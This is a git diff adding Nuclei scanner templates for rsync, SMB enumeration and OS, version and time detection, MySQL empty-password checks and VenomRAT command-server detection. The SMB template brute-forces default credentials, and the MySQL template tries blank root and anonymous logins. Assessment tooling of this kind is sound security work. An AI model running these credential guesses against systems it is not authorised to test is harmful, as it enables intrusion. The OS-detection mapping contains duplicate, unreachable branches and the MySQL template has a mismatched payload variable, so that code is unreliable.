|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require('nuclei/rsync');
|
||||
let c = m.RsyncClient();
|
||||
let response = c.IsRsync(Host,Port);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "873"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- .Banner
|
|
@ -0,0 +1,46 @@
|
|||
id: smb-default-creds
|
||||
|
||||
info:
|
||||
name: SMB Default Credential - Brutforcing
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
Attempts to guess username/password combinations over SMB.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/smb-brute.html
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: "port:445"
|
||||
tags: js,network,smb,enum,default
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
var m = require("nuclei/smb");
|
||||
var c = new m.SMBClient();
|
||||
var response = c.ListShares(Host, Port, User, Pass);
|
||||
response;
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "445"
|
||||
User: "{{usernames}}"
|
||||
Pass: "{{passwords}}"
|
||||
|
||||
attack: clusterbomb
|
||||
payloads:
|
||||
usernames:
|
||||
- 'admin'
|
||||
- 'administrator'
|
||||
- 'guest'
|
||||
passwords:
|
||||
- 'admin'
|
||||
- 'password'
|
||||
- 'guest'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'response != "[]"'
|
||||
- 'success == true'
|
||||
condition: and
|
|
@ -0,0 +1,41 @@
|
|||
id: smb-enum-domains
|
||||
|
||||
info:
|
||||
name: SMB - Enum Domains
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: |
|
||||
SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/smb-enum-domains.html
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: port:445
|
||||
tags: js,network,smb,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
var m = require("nuclei/smb");
|
||||
var c = new m.SMBClient();
|
||||
var response = c.ListSMBv2Metadata(Host, Port);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "445"
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "len(DNSDomainName) != 0"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
internal: true
|
||||
name: DNSDomainName
|
||||
json:
|
||||
- '.DNSDomainName'
|
||||
|
||||
- type: json
|
||||
json:
|
||||
- '"DomainName: "+ .DNSDomainName '
|
|
@ -0,0 +1,158 @@
|
|||
id: smb-os-detect
|
||||
|
||||
info:
|
||||
name: SMB Operating System - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
Detect Operating System
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/smb-os-discovery.html
|
||||
metadata:
|
||||
shodan-query: "port:445"
|
||||
tags: js,network,smb,enum,os
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
var m = require("nuclei/smb");
|
||||
var c = new m.SMBClient();
|
||||
var response = c.ListSMBv2Metadata(Host, Port);
|
||||
if (response.OSVersion === "6.3.9600") {
|
||||
osInfo = "Windows 8.1";
|
||||
} else if (response.OSVersion === "3.10.511") {
|
||||
osInfo = "Windows NT 3.1";
|
||||
} else if (response.OSVersion === "3.50.807") {
|
||||
osInfo = "Windows NT 3.5";
|
||||
} else if (response.OSVersion === "3.10.528") {
|
||||
osInfo = "Windows NT 3.1, Service Pack 3";
|
||||
} else if (response.OSVersion === "3.51.1057") {
|
||||
osInfo = "Windows NT 3.51";
|
||||
} else if (response.OSVersion === "4.00.950") {
|
||||
osInfo = "Windows 95";
|
||||
} else if (response.OSVersion === "4.00.950A") {
|
||||
osInfo = "Windows 95 OEM Service Release 1";
|
||||
} else if (response.OSVersion === "4.00.950B") {
|
||||
osInfo = "Windows 95 OEM Service Release 2";
|
||||
} else if (response.OSVersion === "4.0.1381") {
|
||||
osInfo = "Windows NT 4.0";
|
||||
} else if (response.OSVersion === "4.00.950B") {
|
||||
osInfo = "Windows 95 OEM Service Release 2.1";
|
||||
} else if (response.OSVersion === "4.00.950C") {
|
||||
osInfo = "OEM Service Release 2.5";
|
||||
} else if (response.OSVersion === "4.10.1998") {
|
||||
osInfo = "Windows 98";
|
||||
} else if (response.OSVersion === "4.10.2222") {
|
||||
osInfo = "Windows 98 Second Edition (SE)";
|
||||
} else if (response.OSVersion === "5.0.2195") {
|
||||
osInfo = "Windows 2000";
|
||||
} else if (response.OSVersion === "4.90.3000") {
|
||||
osInfo = "Windows Me";
|
||||
} else if (response.OSVersion === "5.1.2600") {
|
||||
osInfo = "Windows XP";
|
||||
} else if (response.OSVersion === "5.1.2600.1105-1106") {
|
||||
osInfo = "Windows XP, Service Pack 1";
|
||||
} else if (response.OSVersion === "5.2.3790") {
|
||||
osInfo = "Windows Server 2003";
|
||||
} else if (response.OSVersion === "5.1.2600.2180") {
|
||||
osInfo = "Windows XP, Service Pack 2";
|
||||
} else if (response.OSVersion === "5.2.3790.1180") {
|
||||
osInfo = "Windows Server 2003, Service Pack 1";
|
||||
} else if (response.OSVersion === "5.2.3790") {
|
||||
osInfo = "Windows Server 2003 R2";
|
||||
} else if (response.OSVersion === "6.0.6000") {
|
||||
osInfo = "Windows Vista";
|
||||
} else if (response.OSVersion === "5.2.3790") {
|
||||
osInfo = "Windows Server 2003, Service Pack 2";
|
||||
} else if (response.OSVersion === "5.2.4500") {
|
||||
osInfo = "Windows Home Server";
|
||||
} else if (response.OSVersion === "6.0.6001") {
|
||||
osInfo = "Windows Vista, Service Pack 1";
|
||||
} else if (response.OSVersion === "6.0.6001") {
|
||||
osInfo = "Windows Server 2008";
|
||||
} else if (response.OSVersion === "5.1.2600") {
|
||||
osInfo = "Windows XP, Service Pack 3";
|
||||
} else if (response.OSVersion === "6.0.6002") {
|
||||
osInfo = "Windows Vista, Service Pack 2";
|
||||
} else if (response.OSVersion === "6.0.6002") {
|
||||
osInfo = "Windows Server 2008, Service Pack 2";
|
||||
} else if (response.OSVersion === "6.1.7600") {
|
||||
osInfo = "Windows 7";
|
||||
} else if (response.OSVersion === "6.1.7600") {
|
||||
osInfo = "Windows Server 2008 R2";
|
||||
} else if (response.OSVersion === "6.1.7601") {
|
||||
osInfo = "Windows 7, Service Pack 1";
|
||||
} else if (response.OSVersion === "6.1.7601") {
|
||||
osInfo = "Windows Server 2008 R2, Service Pack ";
|
||||
} else if (response.OSVersion === "6.1.8400") {
|
||||
osInfo = "Windows Home Server 2011";
|
||||
} else if (response.OSVersion === "6.2.9200") {
|
||||
osInfo = "Windows Server 2012";
|
||||
} else if (response.OSVersion === "6.2.9200") {
|
||||
osInfo = "Windows 8";
|
||||
} else if (response.OSVersion === "6.3.9600") {
|
||||
osInfo = "Windows 8.1";
|
||||
} else if (response.OSVersion === "6.3.9600") {
|
||||
osInfo = "Windows Server 2012 R2";
|
||||
} else if (response.OSVersion === "10.0.10240") {
|
||||
osInfo = "Windows 10, Version 1507";
|
||||
} else if (response.OSVersion === "10.0.10586") {
|
||||
osInfo = "Windows 10, Version 1511";
|
||||
} else if (response.OSVersion === "10.0.14393") {
|
||||
osInfo = "Windows 10, Version 1607";
|
||||
} else if (response.OSVersion === "10.0.14393") {
|
||||
osInfo = "Windows Server 2016, Version 1607";
|
||||
} else if (response.OSVersion === "10.0.15063") {
|
||||
osInfo = "Windows 10, Version 1703";
|
||||
} else if (response.OSVersion === "10.0.16299") {
|
||||
osInfo = "Windows 10, Version 1709";
|
||||
} else if (response.OSVersion === "10.0.17134") {
|
||||
osInfo = "Windows 10, Version 1803";
|
||||
} else if (response.OSVersion === "10.0.17763") {
|
||||
osInfo = "Windows Server 2019, Version 1809";
|
||||
} else if (response.OSVersion === "10.0.17763") {
|
||||
osInfo = "Windows 10, Version 1809";
|
||||
} else if (response.OSVersion === "6.0.6003") {
|
||||
osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
|
||||
} else if (response.OSVersion === "10.0.18362") {
|
||||
osInfo = "Windows 10, Version 1903";
|
||||
} else if (response.OSVersion === "10.0.18363") {
|
||||
osInfo = "Windows 10, Version 1909";
|
||||
} else if (response.OSVersion === "10.0.18363") {
|
||||
osInfo = "Windows Server, Version 1909";
|
||||
} else if (response.OSVersion === "10.0.19041") {
|
||||
osInfo = "Windows 10, Version 2004";
|
||||
} else if (response.OSVersion === "10.0.19041") {
|
||||
osInfo = "Windows Server, Version 2004";
|
||||
} else if (response.OSVersion === "10.0.19042") {
|
||||
osInfo = "Windows 10, Version 20H2";
|
||||
} else if (response.OSVersion === "10.0.19042") {
|
||||
osInfo = "Windows Server, Version 20H2";
|
||||
} else if (response.OSVersion === "10.0.19043") {
|
||||
osInfo = "Windows 10, Version 21H1";
|
||||
} else if (response.OSVersion === "10.0.20348") {
|
||||
osInfo = "Windows Server 2022, Version 21H2";
|
||||
} else if (response.OSVersion === "10.0.22000") {
|
||||
osInfo = "Windows 11, Version 21H2";
|
||||
} else if (response.OSVersion === "10.0.19044") {
|
||||
osInfo = "Windows 10, Version 21H2";
|
||||
} else if (response.OSVersion === "10.0.22621") {
|
||||
osInfo = "Windows 11, Version 22H2";
|
||||
} else if (response.OSVersion === "10.0.19045") {
|
||||
osInfo = "Windows 10, Version 22H2";
|
||||
} else if (response.OSVersion === "10.0.25398") {
|
||||
osInfo = "Windows Server, Version 23H2";
|
||||
} else if (response.OSVersion === "10.0.22631") {
|
||||
osInfo = "Windows 11, Version 23H2";
|
||||
} else if (response.OSVersion !== "0") {
|
||||
osInfo = response.OSVersion;
|
||||
}
|
||||
osInfo;
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "445"
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- response
|
|
@ -0,0 +1,33 @@
|
|||
id: smb-version-detect
|
||||
|
||||
info:
|
||||
name: SMB Version - Detection
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: |
|
||||
SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
|
||||
metadata:
|
||||
shodan-query: "port:445"
|
||||
tags: js,network,smb,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
let m = require("nuclei/smb");
|
||||
let c = new m.SMBClient();
|
||||
let response = c.ConnectSMBInfoMode(Host, Port);
|
||||
Export(response);
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "445"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "len(smb-version) != 0"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
name: smb-version
|
||||
json:
|
||||
- '.Version.VerString'
|
|
@ -0,0 +1,38 @@
|
|||
id: smb2-server-time
|
||||
|
||||
info:
|
||||
name: SMB2 Server Time - Detection
|
||||
author: DhiyaneshDK
|
||||
severity: info
|
||||
description: |
|
||||
Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
|
||||
reference:
|
||||
- https://nmap.org/nsedoc/scripts/smb2-time.html
|
||||
metadata:
|
||||
shodan-query: "port:445"
|
||||
verified: true
|
||||
tags: js,network,smb,enum
|
||||
|
||||
javascript:
|
||||
- code: |
|
||||
var m = require("nuclei/smb");
|
||||
var c = m.SMBClient();
|
||||
var response = c.ConnectSMBInfoMode(Host,Port);
|
||||
var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
|
||||
var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
|
||||
var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
|
||||
result
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "445"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- success
|
||||
|
||||
extractors:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- response
|
|
@ -0,0 +1,41 @@
|
|||
id: mysql-empty-password
|
||||
|
||||
info:
|
||||
name: MySQL - Empty Password
|
||||
author: DhiyaneshDk
|
||||
severity: high
|
||||
description: |
|
||||
Checks for MySQL servers with an empty password for root or anonymous.
|
||||
metadata:
|
||||
shodan-query: port:3306
|
||||
tags: js,mssql,network
|
||||
|
||||
javascript:
|
||||
- pre-condition: |
|
||||
var m = require("nuclei/mysql");
|
||||
var c = m.MySQLClient();
|
||||
c.IsMySQL(Host, Port);
|
||||
|
||||
code: |
|
||||
var m = require("nuclei/mysql");
|
||||
var c = m.MySQLClient();
|
||||
c.Connect(Host,Port,User,Pass)
|
||||
|
||||
args:
|
||||
Host: "{{Host}}"
|
||||
Port: "3306"
|
||||
User: "{{username}}"
|
||||
Pass: " "
|
||||
|
||||
payloads:
|
||||
usernames:
|
||||
- root
|
||||
- anonymous
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "response == true"
|
||||
- "success == true"
|
||||
condition: and
|
|
@ -0,0 +1,26 @@
|
|||
id: venomrat
|
||||
|
||||
info:
|
||||
name: VenomRAT - Detect
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
reference:
|
||||
- https://twitter.com/v0lundr_/status/1727277517659353297
|
||||
metadata:
|
||||
verified: "true"
|
||||
max-request: 1
|
||||
fofa-query: cert.issuer.cn="VenomRAT Server"
|
||||
tags: c2,ir,osint,malware,ssl,venomrat
|
||||
|
||||
ssl:
|
||||
- address: "{{Host}}:{{Port}}"
|
||||
matchers:
|
||||
- type: word
|
||||
part: issuer_cn
|
||||
words:
|
||||
- "VenomRAT Server"
|
||||
|
||||
extractors:
|
||||
- type: json
|
||||
json:
|
||||
- ".issuer_cn"
|
Loading…
Reference in New Issue